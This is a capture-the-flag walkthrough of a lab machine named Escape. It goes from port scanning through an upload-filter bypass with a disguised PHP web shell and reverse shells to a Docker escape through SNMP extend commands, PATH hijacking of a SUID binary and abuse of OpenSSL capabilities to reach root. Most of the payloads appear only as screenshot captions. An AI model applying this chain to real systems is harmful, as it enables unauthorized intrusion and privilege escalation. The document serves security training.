ESCAPE

• 1-Nmap

• 2-Gobuster

• 3-Burp Suite

• 4-Web Shell

• 5-Docker

• 6-Privilege Escalation

• 7-ltrace

• 8-User Tom

1-Nmap

PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)

8080/tcp   open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)

2-Gobuster

We found two open web ports, 80 and 8080, both appear to be the same but the one on port 8080 has a directory called dev:

Dev directory in gobuster

In this directory it seems that we can only upload .gif files, if we look inside this directory we find /uploads:

Found uploads directory

3-Burp Suite

Knowing this we can upload a web shell and send us a reverse shell through a burp suite request, we will name the file webshell.gif.php to bypass the extension filter, and we will put a simple web shell:

Request of web shell in Burp suite

The file is uploaded correctly:

File uploaded

4-Web Shell

Now if we go to the directory we find the web shell:

Web Shell

Now we are going to send the reverse shell in PHP:

Send the reverse shell

We get the reverse shell:

Get reverse shell

5-Docker

As soon as we create a stable shell we realize that we are in a container because of the hostname:

Docker

And there is a root folder called /.dockerenv:

.dockerenv

First we have to see in which partition the docker is located, we will do this with the command lsblk

sda1

As we can see there is an sda1 subpart of sda, let's continue to enumerate the container for clues with the mount command:

www-data@a7c367c2113d:/var/www$ mount
/dev/sda1 on /tmp type ext4 (rw, relatime, errors=remount-ro,data=ordered)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)

As we can see /dev/sda1 is mounted on /tmp and we can also see that tmpfs is being used to easily transfer files between the host and the container, when you create a container with tmpfs you can write to files outside the container. Knowing this let's confirm where /dev/sda1 is mounted:

sda1 mounted in tmp

We confirm that it is in the /tmp directory, we will keep this information for later, we also find a configuration file of the snmpd service in the /var/backups folder:

snmpd.conf

We found the community string 53cur3M0NiT0riNg which will be useful for later:

community string

Normally you can only have one service running in a container, and as we know the web application is already running, so we can intuit that this service is running on the host. This type of service has an option to execute commands invoking NET-SNMP-EXTEND-MIB, looking for information we found that this service can be exploited with the snmpwalk tool, so we will use the rocummunity to connect, but first we have to install snmpwalk and snmp:

kali@kali:~$ sudo apt-get install snmp -y
kali@kali:~$ sudo apt-get install snmp-mibs-downloader -y
kali@kali:~$ sudo download-mibs

We also change the configuration of /etc/snmp/snmp.conf on our machine:

Modify snmp.conf

We use the snmpwalk tool and it seems to work:

After knowing that we can execute commands because SNMP is looking for the shtest file, let's create a reverse shell in the /tmp directory where the container is mounted:

Reverse shell in shtest

We will now listen on port 4444:

And we run snmpwalk again:

We received the shell:

Shell as Debian-snmp

6-Privilege Escalation

Now that we are on the main host we can escalate privileges, if we look for SUID files we find one called logconsole:

We also see that the owner of this script is tom:

7-ltrace

Let's use ltrace to see what's behind the script:

We find a menu in which we are given different options, if we try them out we see that all of them execute commands but with their absolute path, but in option 6 we see that it only calls the command:

Knowing this, we can create a bash script with the name lscpu and send us a reverse shell, for this we will have to change the PATH variable to our directory:

Reverse shell

Now change the variable:

Run option 6 of the logconsole:

8-User Tom

And we listen on port 5555, we get a reverse shell with the user tom:

Shell as tom

Now that we are in the tom user, after enumerating the machine we find that we have capabilities privileges in OpenSSL:

capabilities in OpenSSL

So we can create a local web server on which we can execute commands, the first thing to do is to create a key with the following command:

tom@escape:/tmp$ openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

We will leave all the spaces empty and the key will be created:

Cert and key

Next, we will go to the root of the system to execute the requests to the web server since it uses pwd as a path, so if we ask for /etc/passwd it will not find it:

Now we will connect via ssh to another terminal to be able to make the requests:

As we can see it works, let's see if the root user has an ssh key to be able to connect:

Indeed, so that we can connect with the rsa of root:

We get the root user!!